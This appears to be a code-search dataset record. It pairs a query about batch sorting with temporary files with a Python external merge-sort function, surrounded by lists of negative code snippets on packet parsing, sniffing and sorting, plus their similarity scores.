(Payload.find('User:') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"pyzor/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t#FIXME - interesting issue; the ttl<5 test will catch traceroutes coming into us, but not ones we're creating to go out. Hmmm.\n\t\t\telif ( (dport >= \"33434\") and (dport <= \"33524\") ) and (p['IP'].ttl <= 5):\t#udptraceroute client\n\t\t\t\tif ((not LiveUDPClient.has_key(sIP + \"UDP_33434\")) or (LiveUDPClient[sIP + \"UDP_33434\"] == False)):\n\t\t\t\t\tLiveUDPClient[sIP + \"UDP_33434\"] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_33434\", \"open\", \"udptraceroute/client\")\n\t\t\telif (dport == \"40348\"):\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('HLS') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (p['IP'].frag > 0):\n\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sIP == \"207.46.51.74\") or (sIP == \"65.55.251.10\"):\t\t\t\t#Bigfish.com - dns?\n\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sIP == \"61.215.106.146\"):\t\t\t\t#junk\n\t\t\t\tUnhandledPacket(p)\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telse:\n\t\t\tDebug(\"Other IP protocol (\" + str(p['IP'].src) + \"->\" + str(p['IP'].dst) + \"): \" + str(p['IP'].proto))\n\t\t\tUnhandledPacket(p)\n\telif p['Ethernet'].type == 0x86DD:\t\t#IPv6\n\t\tUnhandledPacket(p)\n\telse:\n\t\tprint \"Unregistered ethernet type:\", p['Ethernet'].type\n\t\tUnhandledPacket(p)", "def _add_pkt_into_tcp_stream(self, pcap_packet, num):\n \n # the src is server, remote(dst) is client\n if (pcap_packet.ip.dst == _device_ip): # HUA use ip (not 80 port) as direction judgement\n server_addr = pcap_packet.ip.src\n server_port = pcap_packet.tcp.src_port\n client_addr = pcap_packet.ip.dst\n client_port = pcap_packet.tcp.dst_port\n else:\n server_addr = pcap_packet.ip.dst\n server_port = pcap_packet.tcp.dst_port\n client_addr = pcap_packet.ip.src\n client_port = pcap_packet.tcp.src_port\n socket_tuple = (client_addr, client_port, server_addr, server_port)\n if (socket_tuple not in self.tcp_stream_container):\n self.tcp_stream_container[socket_tuple] = Tcp_stream()\n pcap_packet.tcp.stream_index = self.tcp_stream_container[socket_tuple].stream_index\n self.tcp_stream_container[socket_tuple].pcap_num_list.append(num)", "def get_route(self, srcip, daddr): #destinations add of this packet\n # TODO fill in peer?\n peer = None\n\n pos_routes = self.lookup_routes(daddr)\n\n #prefix stuff\n\n pos_routes = self.prefix_stuff(daddr, pos_routes) #look through possible\n #and find prefix matching destination ip\n\n # Rules go here\n #if pos_routes:\n # 1. Highest Preference\n #pos_routes = self.get_highest_preference(pos_routes)\n # 2. Self Origin\n # pos_routes = self.get_self_origin(pos_routes)\n # 3. Shortest ASPath\n # pos_routes = self.get_shortest_as_path(pos_routes)\n # 4. EGP > IGP > UNK\n # pos_routes = self.get_origin_routes(pos_routes)\n # 5. Lowest IP Address\n\n #daddrbit = self.ip_to_bits(daddr)\n\n # Final check: enforce peering relationships\n\n #route = self.filter_relationships(srcip, pos_routes)\n #lowestip = 0;\n\n\n peer = pos_routes[0]\n\n return self.sockets[peer] if peer else None", "def routePacket(self, packet):\n\n for rule in self._rules:\n # check rule mask vs packet ip\n ip = IPHelper.ipToLong(packet._ip)\n\n if rule._raw_ip == '*' or (rule._ip_mask_val & ip == rule._good_ip):\n if rule._direction == packet._direction:\n for p in rule._ports:\n if p == packet._port or p == '*':\n if rule._flag is None:\n #packet is non-established connection\n return rule\n elif rule._flag == 'established' and packet._flag == '1':\n #packet is established connection and flag has been set for established connection\n return rule\n else:\n pass\n else:\n pass\n else:\n pass\n else:\n pass\n\n return None", "def test_overlap1(self):\n\n fragments = []\n for _, frags_400, frags_300 in self.pkt_infos:\n if len(frags_300) == 1:\n fragments.extend(frags_400)\n else:\n for i, j in zip(frags_300, frags_400):\n fragments.extend(i)\n fragments.extend(j)\n\n dropped_packet_indexes = set(\n index for (index, _, frags) in self.pkt_infos if len(frags) > 1\n )\n\n self.pg_enable_capture()\n self.src_if.add_stream(fragments)\n self.pg_start()\n\n packets = self.dst_if.get_capture(\n len(self.pkt_infos) - len(dropped_packet_indexes)\n )\n self.verify_capture(packets, dropped_packet_indexes)\n self.src_if.assert_nothing_captured()", "def main(self):\n self.pid = os.getpid()\n self.fdp.close() # Close fdp on child side\n if self.datasock is None:\n # Create session's data socket and load file\n self.datasock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.load_file()\n logging.info(\"Child process finished loading file\")\n port = UDP_START + self.meta.sessionid # Port used by the session\n poller = select.poll() # poll fdc and datasock\n poller.register(self.fdc.fileno(), select.POLLIN)\n poller.register(self.datasock.fileno(), select.POLLOUT)\n pkt_p = snc.snc_alloc_empty_packet(snc.snc_get_parameters(self.sc))\n while True:\n for fd, event in poller.poll():\n if fd == self.fdc.fileno() and event is select.POLLIN:\n pkt, ip = self.fdc.recv()\n logging.info(\"Session [%d] received msg <%s> from %s.\" %\n (self.meta.sessionid, iMSG[pkt.header.mtype], ip))\n if pkt.header.mtype == MSG['REQ_SEG']:\n self.add_client(HostInfo(ip, self.meta.sessionid))\n self.fdc.send(CCPacket(CCHeader(MSG['OK'])))\n elif pkt.header.mtype == MSG['HEARTBEAT']:\n self.client_heartbeat(ip)\n self.fdc.send(CCPacket(CCHeader(MSG['OK'])))\n elif pkt.header.mtype == MSG['REQ_STOP'] or pkt.header.mtype == MSG['EXIT']:\n self.remove_client(ip)\n self.fdc.send(CCPacket(CCHeader(MSG['OK'])))\n\n if fd == self.datasock.fileno() and event is select.POLLOUT:\n # writable datasock, send data packets to clients\n for cli in self.clients:\n snc.snc_generate_packet_im(self.sc, pkt_p)\n pktstr = pkt_p.contents.serialize(self.meta.sp.size_g,\n self.meta.sp.size_p,\n self.meta.sp.bnc)\n try:\n # Construct data packet with serialized snc_packet\n self.datasock.sendto(CCPacket(CCHeader(MSG['DATA']), pktstr).packed(), (cli.ip, port))\n except:\n logging.warning(\"Caught exception in session %s.\"\n % (self.meta.sessionid,))\n self.lastIdle = datetime.now() # Refresh idle time\n self.housekeeping()", "def read_packet(self):\n\n\t\t#self.debug(\"READ BUFFER SIZE: %d\" % len(self.buff))\n\t\tbackup = self.buff[:]\n\t\tpacket = Packet()\n\t\ttry:\n\t\t\tpacket.direction = self.node\n\t\t\tpacket.ident = self.unpack('ubyte')\n\t\t\t\n\t\t\t#Defined structs from huge dict\n\t\t\tfor datatype, name in self.get_struct(packet):\n\t\t\t\t# this populates packet.data with {name: value}\n\t\t\t\tpacket.data[name] = self.unpack(datatype)\n\n\t\t\t# I believe the following are packet-type specific fixes for variable-length packets.\n\n\t\t\t#0x17\n\t\t\tif packet.ident == 0x17:\n\t\t\t\tif packet.data['unknown'] > 0:\n\t\t\t\t\tpacket.data['x2'] = self.unpack('short')\n\t\t\t\t\tpacket.data['y2'] = self.unpack('short')\n\t\t\t\t\tpacket.data['z2'] = self.unpack('short')\n\t\t\n\t\t\t#0x33\n\t\t\tif packet.ident in (0x33, 0x34):\n\t\t\t\tpacket.data['data'] = self.unpack_array_fast('byte', packet.data['data_size'])\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n#\t\t\t#0x34\n#\t\t\tif packet.ident == 0x34:\n#\t\t\t\tcoords = self.unpack_array_fast('short', packet.data['data_size'])\n#\t\t\t\tbtype = self.unpack_array_fast('byte', packet.data['data_size'])\n#\t\t\t\tmetadata = self.unpack_array_fast('byte', packet.data['data_size'])\n#\t\t\t\tpacket.data[\"blocks\"] = []\n#\t\t\t\tfor i in zip(coords, btype, metadata):\n#\t\t\t\t\tblock = {}\n#\t\t\t\t\tblock[\"x\"] =\t\ti[0] >> 12\n#\t\t\t\t\tblock[\"z\"] = 0x0F & i[0] >> 8\n#\t\t\t\t\tblock[\"y\"] = 0xFF & i[0]\n#\t\t\t\t\tblock[\"type\"] = i[1]\n#\t\t\t\t\tblock[\"metadata\"] = i[2]\n#\t\t\t\t\tpacket.data[\"blocks\"].append(block)\n#\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n\t\t\t#0x3C\n\t\t\tif packet.ident == 0x3C:\n\t\t\t\trecords = self.unpack_array_fast('byte', packet.data['data_size']*3)\n\t\t\t\ti = 0\n\t\t\t\tpacket.data[\"blocks\"] = []\n\t\t\t\twhile i < packet.data['data_size']*3:\n\t\t\t\t\tpacket.data[\"blocks\"].append(dict(zip(('x','y','z'), records[i:i+3])))\n\t\t\t\t\ti+=3\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n\t\t\t#0x68\n\t\t\tif packet.ident == 0x68:\n\t\t\t\tpacket.data[\"slots_data\"] = self.unpack_array('slot', packet.data[\"data_size\"])\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\t#0x82:\n\t\t\tif packet.ident == 0x82:\n\t\t\t\tpacket.data[\"text\"] = []\n\t\t\t\tfor i in range(4):\n\t\t\t\t\tpacket.data[\"text\"].append(packet.data[\"line_%s\" % (i+1)])\n\t\t\t\t\t\n\t\t\t#0x83\n\t\t\tif packet.ident == 0x83:\n\t\t\t\tpacket.data[\"data\"] = self.unpack_array_fast('byte', packet.data['data_size'])\n\t\t\t\tdel packet.data[\"data_size\"]\n\n\t\t\t# Sets packet.original to the byte string that the packet was decoded from.\n\t\t\tpacket.original = backup[:len(backup) - len(self.buff)]\n\n\t\t\treturn packet\n\n\t\texcept IncompleteData:\n\t\t\tself.buff = backup\n\t\t\treturn None\n\t\texcept Exception, ex:\n\t\t\tself.buff = backup\n\t\t\tex.args += (self.buff[20:],)\n\t\t\traise", "def _packets_from_tshark_sync(self, tshark_process, packet_count=None, timeout:float=3.0,\n max_data_length:int=10000):\n # NOTE: This has code duplication with the async version, think about how to solve this\n\n psml_structure, data = self.eventloop.run_until_complete(self._get_psml_struct(tshark_process.stdout))\n packets_captured = 0\n\n data = b\"\"\n try:\n while self.is_open.value:\n try:\n packet, data = self.eventloop.run_until_complete(\n self._get_packet_from_stream(tshark_process.stdout, \n data,\n psml_structure=psml_structure,\n got_first_packet=packets_captured > 0, \n timeout=timeout))\n except EOFError:\n echo(\"Caught EOF\", file=Interceptor.stdout)\n self._log.debug(\"EOF reached (sync)\")\n break\n\n if(packet is False): continue\n\n if packet:\n packets_captured += 1\n yield packet\n if packet_count and packets_captured >= packet_count:\n break\n if len(data) > max_data_length:\n data = b''\n finally:\n if tshark_process in self._running_processes:\n self.eventloop.run_until_complete(self._cleanup_subprocess(tshark_process))", "def agent_player(env_name, ip):\n\n # Create the main generator\n receiver_gen = atari_frames_generator(env_name, ip)\n\n # Loop\n while True:\n\n # Receive\n frame, termination = next(receiver_gen)\n\n # Skip if repeated\n assert termination in (\"continue\", \"last\", \"repeated_last\")\n if termination == \"repeated_last\":\n continue\n\n # Return\n yield frame", "def read_pkt_line(self):\n if self._readahead is None:\n read = self.read\n else:\n read = self._readahead.read\n self._readahead = None\n\n try:\n sizestr = read(4)\n if not sizestr:\n raise HangupException()\n size = int(sizestr, 16)\n if size == 0:\n if self.report_activity:\n self.report_activity(4, \"read\")\n return None\n if self.report_activity:\n self.report_activity(size, \"read\")\n pkt_contents = read(size - 4)\n except socket.error as e:\n raise GitProtocolError(e)\n else:\n if len(pkt_contents) + 4 != size:\n raise GitProtocolError(\n \"Length of pkt read %04x does not match length prefix %04x\"\n % (len(pkt_contents) + 4, size)\n )\n return pkt_contents", "def getPacket(self, index):\n\t\treturn self.packets[index.row()]", "def print_packet(self, pkt):\n ip_layer = pkt.getlayer(IP)\n print(\"[!] New Packet: {src} -> {dst}\".format(src=ip_layer.src, dst=ip_layer.dst))", "def sniffer():\n try:\n sniff(iface=INTERFACE, prn=print_frame, filter='udp and (port bootps or bootps)', store=0)\n except Exception as _e:\n print(\"ERROR - sniffer(): {} {}\".format(_e.args, _e.message))", "def from_physical_layer(conn, FRAME_LENGTH, FORMAT):\r\n frame = conn.recv(FRAME_LENGTH).decode(FORMAT)\r\n print(f\"[from_physical_layer] frame:{frame}\")\r\n return frame", "def recieve_can(offset):\n panda = Panda()\n while True:\n data = panda.can_recv()\n if data != []: \n for x in data:\n if x[0] == offset: \n if x[3] == 0: \n mes = f'{x[0]}, 0x{x[2].hex()}, {x[3]}'\n print(mes)", "def nat_openconn(destmac, destport, localip=None, localport=None, timeout = 5, forwarderIP=None,forwarderPort=None,usetimeoutsock=False): \r\n # cast the destmac to a string, internal methods may fail otherwise\r\n destmac = str(destmac)\r\n\r\n # use the forwarderIP and port provided\r\n if forwarderIP != None and forwarderPort != None:\r\n return _nat_try_connection_list([(forwarderIP,forwarderPort)],\r\n localip,localport,timeout,destmac,destport,usetimeoutsock) \r\n \r\n \r\n # lookup the destmac if forwarderIP and port are not provided\r\n else: \r\n # check the cache\r\n if destmac in NAT_SRV_CACHE:\r\n forwarders = NAT_SRV_CACHE[destmac]\r\n \r\n try:\r\n return _nat_try_connection_list(forwarders,localip,localport,timeout,destmac,destport,usetimeoutsock)\r\n \r\n except: # remove this entry from the cache\r\n del NAT_SRV_CACHE[destmac] \r\n \r\n # the cache failed, so do a fresh lookup\r\n forwarders = nat_server_list_lookup(destmac)\r\n socket = _nat_try_connection_list(forwarders,localip,localport,timeout,destmac,destport,usetimeoutsock)\r\n \r\n #this list succeded so add it to the cache\r\n NAT_SRV_CACHE[destmac] = forwarders\r\n \r\n return socket", "def payload_data(self, pkts):\n\n\t\t#Get all the payload bytes exchanged over MPTCP connections\n\t\tpayload_bytes = 0\n\t\tprint \"Determining the number of payload bytes excluding headers....\"\n\t\t#DSS = 0x2\n\t\tfor i in range(len(pkts)):\n\t\t\tif(TCPOption_MP in pkts[i] and pkts[i][TCPOption_MP].mptcp.subtype == 2 and Raw in pkts[i]):\n\t\t\t\tpayload_bytes += len(pkts[i][Raw].load)\n\t\t\t\t#print(\"DSN: %s; subflow_seqnum: %s; Data(bytes): %s\" % (pkts[i][TCPOption_MP].mptcp.dsn, pkts[i][TCPOption_MP].mptcp.subflow_seqnum, len(pkts[i][Raw].load)))\n\n\t\tprint \"Total Number of payload bytes in the file (entire MPTCP connections) excluding headers): %s\" % (payload_bytes)\n\t\t#MPTCP WITH SUBFLOW CONNECTIONS\n\t\t#MPTCP_JOINs = 0x1\n\t\tprint \"============================================================\"\n\t\tprint \"SUBFLOW Connections with their respective MPTCP connection (identified by connectionID)\"\n\t\tfor i in range(len(pkts)):\n\n\t\t\t#Initial Join Message\n\t\t\t#rcv_token Identifies the connection to which the subflow belongs: connectionID\n\t\t\tif(MPTCP_JoinSYN in pkts[i] and pkts[i][TCPOption_MP].mptcp.subtype == 1):\n\t\t\t\tprint(\"New subflow: connectionID: %s; src: %s; dest: %s; snd_nonce: %s\" % (pkts[i][TCPOption_MP].mptcp.rcv_token, pkts[i][IP].src, pkts[i][IP].dst, pkts[i][TCPOption_MP].mptcp.snd_nonce))\n\n\t\t#TODO: Now Need to track per-connection and per-subflow state", "def test_overlap1(self):\n\n fragments = []\n for _, _, frags_300, frags_200 in self.pkt_infos:\n if len(frags_300) == 1:\n fragments.extend(frags_300)\n else:\n for i, j in zip(frags_200, frags_300):\n fragments.extend(i)\n fragments.extend(j)\n\n self.pg_enable_capture()\n self.src_if.add_stream(fragments)\n self.pg_start()\n\n packets = self.dst_if.get_capture(len(self.pkt_infos))\n self.verify_capture(packets)\n self.src_if.assert_nothing_captured()\n\n # run it all to verify correctness\n self.pg_enable_capture()\n self.src_if.add_stream(fragments)\n self.pg_start()\n\n packets = self.dst_if.get_capture(len(self.pkt_infos))\n self.verify_capture(packets)\n self.src_if.assert_nothing_captured()", "def sniff_offline(args):\n print('viewer: reading from ' + args.read)\n\n try:\n with open(args.read, 'rb') as f:\n reader = dpkt.pcap.Reader(f)\n\n if not args.count:\n count = True\n else:\n count = args.count\n\n while count:\n ts, pkt = next(iter(reader))\n ret = parse_ICMP_Echo(ts, pkt)\n\n if ret and args.count:\n count -= 1\n except FileNotFoundError as e:\n print('File \\'{}\\' not found.'.format(args.read))\n sys.exit(1)\n except StopIteration:\n sys.exit(0)", "def packet_to_kml(packet, reader):\n\n try:\n src_ip = packet[IP].src\n src_kml = ip_to_kml(src_ip, reader)\n except:\n src_kml = None\n try:\n dest_ip = packet[IP].dest\n dest_kml = ip_to_kml(dest_ip, reader)\n except:\n dest_kml = None\n\n if src_kml is not None and dest_kml is not None:\n connect_kml = ips_to_line_kml(src_ip, dest_ip, reader)\n print(\"Added connection\")\n else:\n connect_kml = None\n\n return src_kml, dest_kml, connect_kml", "def create_stream(cls, packet_sizes, packet_count=test_packet_count):\n for i in range(0, packet_count):\n info = cls.create_packet_info(cls.src_if, cls.src_if)\n payload = cls.info_to_payload(info)\n p = (\n IP(id=info.index, src=cls.src_if.remote_ip4, dst=cls.dst_if.remote_ip4)\n / UDP(sport=1234, dport=5678)\n / Raw(payload)\n )\n size = packet_sizes[(i // 2) % len(packet_sizes)]\n cls.extend_packet(p, size, cls.padding)\n info.data = p", "def ReceiveMessageFromPacketInfo(self) -> IPPacketInformation:", "def give_packets(self, packets, verbose=False, cache=False, tunnel=None, source_sock_addr=None):\n assert isinstance(packets, list)\n assert all(isinstance(packet, str) for packet in packets)\n assert isinstance(verbose, bool)\n assert isinstance(cache, bool)\n assert tunnel is None, \"TUNNEL property is set using init_socket(...)\"\n assert source_sock_addr is None or isinstance(source_sock_addr, tuple), type(source_sock_addr)\n if verbose:\n logger.debug(\"giving %d bytes\", sum(len(packet) for packet in packets))\n if source_sock_addr is None:\n source_sock_addr = self.lan_address\n candidate = Candidate(source_sock_addr, self._tunnel)\n self._dispersy.on_incoming_packets([(candidate, packet) for packet in packets], cache=cache, timestamp=time())\n return packets" ]
[ "0.5710354", "0.5529603", "0.5436237", "0.5389503", "0.5370659", "0.5341635", "0.5319951", "0.5312948", "0.5296589", "0.52821374", "0.5232271", "0.5231817", "0.5208476", "0.52023923", "0.51755023", "0.5116855", "0.5112408", "0.5110333", "0.5092085", "0.5089987", "0.5086152", "0.5080938", "0.5051528", "0.5051528", "0.5011665", "0.50084186", "0.5007459", "0.49958622", "0.49733213", "0.49542275", "0.495417", "0.49498022", "0.49460396", "0.49303383", "0.48881605", "0.48586914", "0.48477185", "0.4837219", "0.48050243", "0.4789931", "0.47893512", "0.4788178", "0.47869468", "0.47613704", "0.4752663", "0.47500047", "0.47426605", "0.47332984", "0.47233394", "0.4714982", "0.47131625", "0.4697844", "0.4697158", "0.46857035", "0.46792635", "0.46711436", "0.4664068", "0.4660284", "0.46519208", "0.46505415", "0.46443844", "0.46024713", "0.45999685", "0.45896453", "0.4589577", "0.45727187", "0.45695475", "0.4561564", "0.45561558", "0.45406654", "0.45351273", "0.45255303", "0.4524231", "0.45210078", "0.4517039", "0.4505856", "0.44961685", "0.4495365", "0.448878", "0.44851944", "0.44837207", "0.44794542", "0.44755214", "0.44672287", "0.4463968", "0.44579118", "0.44571388", "0.44558287", "0.44551775", "0.44505128", "0.4447302", "0.4434669", "0.4434428", "0.4431039", "0.44281664", "0.44205582", "0.44168368", "0.4408865", "0.44071707", "0.4406922" ]
0.69073343
0
batch sort helper with temporary files, supports sorting large stuff
def batch_sort(input_iterator, output_path, buffer_size=1024**2, output_class=None): if not output_class: output_class = input_iterator.__class__ chunks = [] try: while True: current_chunk = list(islice(input_iterator,buffer_size)) if not current_chunk: break current_chunk.sort() output_chunk_name = os.path.join(TMPD, "%06i" % len(chunks)) output_chunk = output_class(output_chunk_name) for elem in current_chunk: output_chunk.write(elem.obj) output_chunk.close() chunks.append(input_iterator.__class__(output_chunk_name)) output_file = output_class(output_path) for elem in heapq.merge(*chunks): output_file.write(elem.obj) output_file.close() except: raise finally: for chunk in chunks: try: chunk.close() os.remove(chunk.name) except Exception: pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def batchSort(input, output, key, buffer_size, tempdir):\n def merge(key=None, *iterables):\n if key is None:\n keyed_iterables = iterables\n else:\n Keyed = namedtuple(\"Keyed\", [\"key\", \"obj\"])\n keyed_iterables = [(Keyed(key(obj), obj) for obj in iterable)\n for iterable in iterables]\n for element in heapq.merge(*keyed_iterables):\n yield element.obj\n\n tempdir = os.path.join(tempdir, str(uuid.uuid4()))\n os.makedirs(tempdir)\n chunks = []\n try:\n with open(input, 'rb', 64 * 1024) as inputFile:\n inputIter = iter(inputFile)\n while True:\n current_chunk = list(islice(inputIter, buffer_size))\n if not current_chunk:\n break\n current_chunk.sort(key=key)\n output_chunk = open(\n os.path.join(tempdir, '%06i' % len(chunks)), 'w+b',\n 64 * 1024)\n chunks.append(output_chunk)\n output_chunk.writelines(current_chunk)\n output_chunk.flush()\n output_chunk.seek(0)\n with open(output, 'wb', 64 * 1024) as output_file:\n output_file.writelines(merge(key, *chunks))\n finally:\n for chunk in chunks:\n try:\n chunk.close()\n os.remove(chunk.name)\n except Exception:\n pass\n print(\"sorted file %s ready\" % (output))", "def f_way_sort(buffer_size: int, input_paths: list, output_path: str):\n pass", "def external_sort(input_file_name, block_size, output_file_name=None):\n if output_file_name is None:\n output_file_name = input_file_name\n sorter = ExternalSort(input_file_name, block_size, output_file_name)\n sorter.run()", "def step020():\n logger.logMessage('Begin: Sorting records')\n sortCommand = 'sort {0} -t \\';\\' --key 2 -o {1}'.format(candidatesFile,sortedCandidatesFile) \n rc = os.system(sortCommand)\n if rc != 0:\n raise Exception('Error returned by sort program: {0:d}'.format(rc))\n logger.logMessage('End : Sorting records')", "def test_sort():\n data = [\"filename_{}.py\".format(i) for i in range(200)]\n temp = data[:]\n random.shuffle(temp)\n assert data == sort(temp)", "def testSorting(self):\n mtt.makeTempDirParent()\n shuffledTargets = list(g_targetBlocks)\n for i in xrange(0, 200):\n tmpDir = os.path.abspath(mtt.makeTempDir('sorting'))\n random.shuffle(g_nonTargetBlocks)\n random.shuffle(shuffledTargets)\n shuffledBlocks = list(shuffledTargets)\n lower = 0\n for j in xrange(0, len(g_nonTargetBlocks)):\n # randomly insert the non target blocks, but keep a record\n # of their relative order.\n index = random.randint(lower, len(shuffledBlocks))\n shuffledBlocks.insert(index, g_nonTargetBlocks[j])\n lower = index + 1\n testMaf = mtt.testFile(os.path.abspath(os.path.join(tmpDir, 'test.maf')), \n ''.join(shuffledBlocks), g_headers)\n parent = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n cmd = [os.path.abspath(os.path.join(parent, 'test', 'mafSorter'))]\n cmd += ['--maf', os.path.abspath(os.path.join(tmpDir, 'test.maf')), \n '--seq', 'hg18.chr7']\n outpipes = [os.path.abspath(os.path.join(tmpDir, 'sorted.maf'))]\n mtt.recordCommands([cmd], tmpDir, outPipes=outpipes)\n mtt.runCommandsS([cmd], tmpDir, outPipes=outpipes)\n self.assertTrue(mafIsSorted(os.path.join(tmpDir, 'sorted.maf')))\n mtt.removeDir(tmpDir)", "def mysorted(*args, **kwargs):\n _ = kwargs.pop(\"chunksize\", None)\n return sorted(*args, **kwargs)", "def _fix_shortsort(self):\n test_dir = join_path(self.install_test_root, self.test_src_dir)\n filter_file(\"../src/\", \"\", join_path(test_dir, \"testshortsort.sh\"))", "def sort_pairs(abx_file, by, memory=1000, tmpdir=None):\n # estimate of the amount of data to be sorted\n with h5py.File(abx_file, 'a') as fh:\n n = fh['/pairs/' + str(by)].shape[0]\n i = fh['/pairs/' + str(by)].dtype.itemsize\n\n # harmonize units in Ko\n memory = 1000 * memory\n amount = n * i / 1000.\n\n # be conservative: aim at using no more than 3/4 the available\n # memory if enough memory take one chunk (this will do an\n # unnecessary full write and read of the file... could be\n # optimized easily, would it be beneficial to have large\n # o_buffer_size as well?)\n if amount <= 0.75 * memory:\n buffer_size = amount\n\n # else take around 30 chunks if possible (this seems efficient\n # given the current implem, using a larger number of chunks\n # efficiently might be possible if the reading chunks part of the\n # sort was cythonized ?)\n elif amount / 30. <= 0.75 * memory:\n buffer_size = amount / 30.\n\n # else take minimum number of chunks possible given the\n # available RAM\n else:\n buffer_size = 0.75 * memory\n\n # finally sort the pairs in place\n handler = h5_handler.H5Handler(abx_file, '/pairs/', str(by))\n handler.sort(buffer_size=buffer_size, tmpdir=tmpdir)", "def call_coreutils_sort(cmds, tmpfn=None, stdin=None):\n input_is_stream = stdin is not None\n output_is_stream = tmpfn is None\n\n try:\n # coming from an iterator, sending as iterator\n if input_is_stream and output_is_stream:\n logger.debug('helpers.call_coreutils_sort(): input is stream, output is stream')\n logger.debug('helpers.call_coreutils_sort(): cmds=%s', ' '.join(cmds))\n p = subprocess.Popen(cmds,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n stdin=subprocess.PIPE,\n bufsize=BUFSIZE,\n env={'LC_ALL': 'C'})\n for line in stdin:\n p.stdin.write(line.encode())\n p.stdin.close() # This is important to prevent deadlocks\n\n output = (i.decode('UTF-8') for i in p.stdout)\n stderr = None\n\n # coming from an iterator, writing to file\n if input_is_stream and not output_is_stream:\n logger.debug('helpers.call_coreutils_sort(): input is stream, output is file')\n logger.debug('helpers.call_coreutils_sort(): cmds=%s', ' '.join(cmds))\n outfile = open(tmpfn, 'wb')\n p = subprocess.Popen(cmds,\n stdout=outfile,\n stderr=subprocess.PIPE,\n stdin=subprocess.PIPE,\n bufsize=BUFSIZE,\n env={'LC_ALL': 'C'})\n if hasattr(stdin, 'read'):\n stdout, stderr = p.communicate(stdin.read())\n p.stdin.close()\n else:\n for item in stdin:\n p.stdin.write(item.encode())\n stdout, stderr = p.communicate()\n p.stdin.close()\n output = tmpfn\n outfile.close()\n\n # coming from a file, sending as iterator\n if not input_is_stream and output_is_stream:\n logger.debug('helpers.call_coreutils_sort(): input is filename, output is stream')\n logger.debug('helpers.call_coreutils_sort(): cmds=%s', ' '.join(cmds))\n p = subprocess.Popen(cmds,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n bufsize=BUFSIZE,\n env={'LC_ALL': 'C'})\n output = (i.decode('UTF-8') for i in p.stdout)\n stderr = None\n\n # file-to-file\n if not input_is_stream and not output_is_stream:\n logger.debug('helpers.call_coreutils_sort(): input is filename, output is filename (%s)', tmpfn)\n logger.debug('helpers.call_coreutils_sort(): cmds=%s', ' '.join(cmds))\n outfile = open(tmpfn, 'wb')\n p = subprocess.Popen(cmds,\n stdout=outfile,\n stderr=subprocess.PIPE,\n bufsize=BUFSIZE,\n env={'LC_ALL': 'C'})\n stdout, stderr = p.communicate()\n output = tmpfn\n outfile.close()\n\n if stderr:\n if isinstance(stderr, bytes):\n stderr = stderr.decode('UTF_8')\n raise BEDToolsError(subprocess.list2cmdline(cmds), stderr)\n\n except (OSError, IOError) as err:\n print('%s: %s' % (type(err), os.strerror(err.errno)))\n print('The command was:\\n\\n\\t%s\\n' % subprocess.list2cmdline(cmds))\n raise err\n\n return output", "def sort(unsorted_bed_file_name, sorted_bed_file_name):\n array_call = ['sort', '-k', '1,1', '-k', '2,2n',\n unsorted_bed_file_name, '-o', sorted_bed_file_name]\n p = _handleExceptionAndCheckCall(array_call)\n return p", "def test_benchmark_sorted(benchmark, benchmark_items_fixture):\n do_benchmark(benchmark_items_fixture, sorted, benchmark)", "def test_benchmark_xsorted(partition_size, benchmark, benchmark_items_fixture):\n xsorted_ = xsorter(partition_size=partition_size)\n do_benchmark(benchmark_items_fixture, xsorted_, benchmark)", "def mergeAllSortedFiles():\n entries = os.listdir('output/Temp/input')\n for entry in entries:\n arr = []\n with open(\"output/Temp/input/\" + entry) as file:\n for line in file:\n line = int(line.strip())\n arr.append(line)\n mergeSortedToFile(arr)", "def sortDataFileByModel(self, fileByModel):\n t1 = time.time()\n print(\"sorting files....\")\n ensure_dir(SORT_DIR)\n processPool = []\n for model in list(fileByModel.keys()):\n mergedFile = '%s/%s.txt' % (MERGE_DIR, model)\n sortedFile = '%s/%s.txt' % (SORT_DIR, model)\n if self.ignore_invalid:\n key = eval('lambda l: -float(l.split(\"' + self.delimiter +\n '\")[2] or 0.0)')\n else:\n key = eval('lambda l: -float(l.split(\"' + self.delimiter +\n '\")[2])')\n process = Process(target=batchSort, args=(mergedFile, sortedFile, key, self.buffer_size, self.tempdir))\n process.start()\n processPool.append(process)\n\n for process in processPool:\n process.join()\n t2 = time.time()\n print(\"sorting files take %ss\" % (t2 - t1))", "def alphabetize_chunk_files(base):\n (base, ext) = os.path.splitext(base)\n\n names = []\n for name in glob.glob('{base}*{ext}'.format(base=base, ext=ext)):\n try:\n names.append(parse_chunk_name(name))\n except ValueError:\n pass\n\n max_width = max([len(parts[2]) for parts in names])\n\n sources = ['_'.join(parts) + ext for parts in names]\n dests = [get_chunk_file_name(base + ext,\n (int(parts[1]), int(parts[2])),\n width=max_width) for parts in names]\n\n for src, dest in zip(sources, dests):\n shutil.move(src, dest)\n\n return dests", "def sortData(unsortedList):\r\n # We will begin with the data from the bubble sort\r\n bubbleSortData = []\r\n bubbleSortOptData = []\r\n selectionSortData = []\r\n insertionSortData = []\r\n\r\n # The range of testing will begin at zero\r\n testRange = 0\r\n\r\n for i in range(len(unsortedList) + 1):\r\n bubbleSortCount = Sorts.bubbleSort(unsortedList[:testRange])\r\n 